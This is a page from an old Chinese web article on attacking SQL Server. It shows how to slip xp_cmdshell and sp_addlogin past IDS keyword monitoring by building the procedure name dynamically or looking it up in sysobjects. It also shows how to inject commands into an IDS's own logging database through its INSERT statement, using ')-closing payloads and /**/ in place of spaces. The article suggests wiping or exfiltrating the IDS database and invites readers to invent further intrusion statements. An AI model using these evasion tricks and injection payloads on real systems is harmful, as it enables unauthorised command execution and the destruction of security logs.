WEB开发网
开发学院数据库MSSQL Server SQL Server数据库的一些攻击 阅读

SQL Server数据库的一些攻击

 2007-11-11 04:40:07 来源:WEB开发网   
核心提示: 利用t-sql骗过ids或攻击ids 现在的ids已经变得越来越聪明了 有的ids加入了xp_cmdshell sp_addlogin 的监视 , 但是毕竟人工智能没有出现的今天,SQL Server数据库的一些攻击(4),这种监视总是有种骗人的感觉 先说说欺骗ids: ids既然监视xp_cmdshell关键字,那
  利用t-sql骗过ids或攻击ids

  现在的ids已经变得越来越聪明了

  有的ids加入了xp_cmdshell sp_addlogin 的监视 。

  但是毕竟人工智能没有出现的今天,这种监视总是有种骗人的感觉

  先说说欺骗ids:

  ids既然监视xp_cmdshell关键字,那么我们可以这么做

  declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\'

  这个代码相信大家都能看明白,还有xp_cmdshell作为一个store procedure在master库内有一个id号,固定的,我们也可以这么做

  假设这个id=988456

  declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'

  当然也可以

  declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'

  这种做法排列组合,ids根本不可能做的到完全监视

  同理,sp_addlogin也可以这么做

  再说说攻击ids:

  因为ids数据量很大,日至通常备份到常规数据库,比如sql server(WINDOWS平台上强大的数据库平台)

  如果用古老的recordset.addnew做法,会严重影响ids的性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql server(WINDOWS平台上强大的数据库平台) 去做

  通常程序会这么写ues ('日至内容',...)

  那么我么想想看,如果用

  temp') exec xp_cmdshell 'dir c:\' --

  提交后会变成

  insert table values ('日至内容'....'temp') exec xp_cmdshell 'dir c:\' -- ')

  这样,xp_cmdshell就可以在ids的数据库运行了 :)

  当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成%20

  因此,%20会被提交到sql server(WINDOWS平台上强大的数据库平台),这样你的命令就无法执行了

  唯一的办法就是

  insert/**/table/**/values('日至内容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')

  用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行

  当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录

  呵呵 ,其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/ ,本来asp是select语句,那么用'就可以屏蔽,现在ids用insert语句,那么用')屏蔽

    好了,其他很多新的入侵语句大家可以自己慢慢想,最好的测试工具就是query analyzer了。

上一页  1 2 3 4 

Tags:SQL Server 数据库

编辑录入:coldstar [复制链接] [打 印]
赞助商链接